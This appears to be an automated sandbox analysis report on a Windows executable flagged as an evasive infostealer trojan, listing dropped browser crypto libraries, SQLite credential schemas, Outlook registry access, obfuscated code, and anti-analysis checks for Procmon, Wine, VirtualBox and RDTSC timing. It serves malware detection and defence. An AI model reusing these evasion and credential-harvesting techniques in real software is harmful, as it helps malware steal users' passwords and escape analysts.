Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C619A60 0_2_6C619A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61E2F0 0_2_6C61E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C618AC0 0_2_6C618AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F1AF0 0_2_6C5F1AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C604AA0 0_2_6C604AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C642AB0 0_2_6C642AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ECAB0 0_2_6C5ECAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64BA90 0_2_6C64BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D22A0 0_2_6C5D22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D5340 0_2_6C5D5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EC370 0_2_6C5EC370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61D320 0_2_6C61D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6453C8 0_2_6C6453C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DF380 0_2_6C5DF380
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 006F45C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6194D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C60CBE8 appears 134 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.1984867256.000000006C662000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1985111220.000000006C855000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: kkjueqgp ZLIB complexity 0.9948693854979004
Source: file.exe, 00000000.00000003.1686260675.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1963816981.00000000006F1000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C637030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C637030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00709600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00709600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00703720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00703720
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\R1C18X3N.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1976081255.000000001D809000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1984645262.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1985029287.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1976081255.000000001D809000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1984645262.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1985029287.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1976081255.000000001D809000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1984645262.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1985029287.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1976081255.000000001D809000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1984645262.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1985029287.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1976081255.000000001D809000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1984645262.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1985029287.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1976081255.000000001D809000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1984645262.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1976081255.000000001D809000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1984645262.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1985029287.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1806945799.000000001D704000.00000004.00000020.00020000.00000000.sdmp, FBAKEHIEBKJJJJJKKKEG.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1976081255.000000001D809000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1984645262.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1976081255.000000001D809000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1984645262.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1863680 > 1048576
Source: file.exe Static PE information: Raw size of kkjueqgp is bigger than: 0x100000 < 0x1a0c00
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1984825270.000000006C64D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1985029287.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1985029287.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1984825270.000000006C64D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.6f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;kkjueqgp:EW;xkoondrm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;kkjueqgp:EW;xkoondrm:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00709860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00709860
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x1c9584 should be: 0x1c96ca
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: kkjueqgp
Source: file.exe Static PE information: section name: xkoondrm
Source: file.exe Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D209D push ecx; mov dword ptr [esp], eax 0_2_009D2108
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D209D push 7231B205h; mov dword ptr [esp], ebx 0_2_009D2195
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9E88C push edx; mov dword ptr [esp], ecx 0_2_00A9E8EB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9E88C push edx; mov dword ptr [esp], ebx 0_2_00A9E908
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B7088B push eax; mov dword ptr [esp], ebp 0_2_00B708CA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B378F7 push eax; mov dword ptr [esp], ebx 0_2_00B37934
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070B035 push ecx; ret 0_2_0070B048
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA70E5 push 528B830Ah; mov dword ptr [esp], esi 0_2_00BA7105
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA70E5 push 03745DB1h; mov dword ptr [esp], esi 0_2_00BA7134
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009AA8F5 push 4548B0CBh; mov dword ptr [esp], ecx 0_2_009AA946
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009AA8F5 push 4DE49E00h; mov dword ptr [esp], ebx 0_2_009AA958
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009AA8F5 push edx; mov dword ptr [esp], edi 0_2_009AA95C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009AA8F5 push ebp; mov dword ptr [esp], edx 0_2_009AA991
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009AA8F5 push ebp; mov dword ptr [esp], eax 0_2_009AA9A3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B320CD push eax; mov dword ptr [esp], 4EF3DC65h 0_2_00B320E1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B320CD push edx; mov dword ptr [esp], 2A053D3Fh 0_2_00B32116
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC6020 push 2A2FC5DCh; mov dword ptr [esp], ebp 0_2_00AC6062
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D4854 push 394CE4BCh; mov dword ptr [esp], ebp 0_2_009D4892
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D4854 push ecx; mov dword ptr [esp], eax 0_2_009D490C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B63862 push ecx; mov dword ptr [esp], 7FFFF2F6h 0_2_00B63885
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B63862 push ebx; mov dword ptr [esp], eax 0_2_00B638B5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B63862 push 0CE1496Ch; mov dword ptr [esp], eax 0_2_00B63949
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B78851 push eax; mov dword ptr [esp], 42DC40CAh 0_2_00B788BC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B78851 push edi; mov dword ptr [esp], ebp 0_2_00B78913
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB29A9 push ebx; mov dword ptr [esp], esi 0_2_00AB29DE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB29A9 push edx; mov dword ptr [esp], 033079ECh 0_2_00AB2B05
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB29A9 push ecx; mov dword ptr [esp], edx 0_2_00AB2B27
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB29A9 push edi; mov dword ptr [esp], 7FABB124h 0_2_00AB2B2C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB29A9 push edx; mov dword ptr [esp], ebx 0_2_00AB2B9A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB29A9 push edi; mov dword ptr [esp], ebx 0_2_00AB2BB8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB29A9 push 4DA20C8Ah; mov dword ptr [esp], ebp 0_2_00AB2C17
Source: file.exe Static PE information: section name: kkjueqgp entropy: 7.953602249289906
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00709860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00709860

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 952025 second address: 952029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC64E3 second address: AC64E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC5504 second address: AC550E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F23952C8E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC550E second address: AC5524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F23947D038Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC569A second address: AC56A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F23952C8E26h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC56A8 second address: AC56AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC5814 second address: AC581E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F23952C8E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC581E second address: AC5828 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F23947D038Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC5C17 second address: AC5C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F23952C8E2Fh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007F23952C8E26h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jno 00007F23952C8E2Ch 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC5DC7 second address: AC5DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC98D8 second address: AC98DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC98DC second address: AC98E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC9915 second address: AC9930 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F23952C8E2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F23952C8E26h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC9930 second address: AC9936 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC9B01 second address: AC9B7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F23952C8E36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f pushad 0x00000010 jmp 00007F23952C8E2Ch 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edi 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F23952C8E28h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D1C61h], ebx 0x0000003a push 00000000h 0x0000003c call 00007F23952C8E39h 0x00000041 sbb dh, FFFFFFA2h 0x00000044 pop edx 0x00000045 push 95DC64FFh 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d push ebx 0x0000004e pop ebx 0x0000004f rdtsc
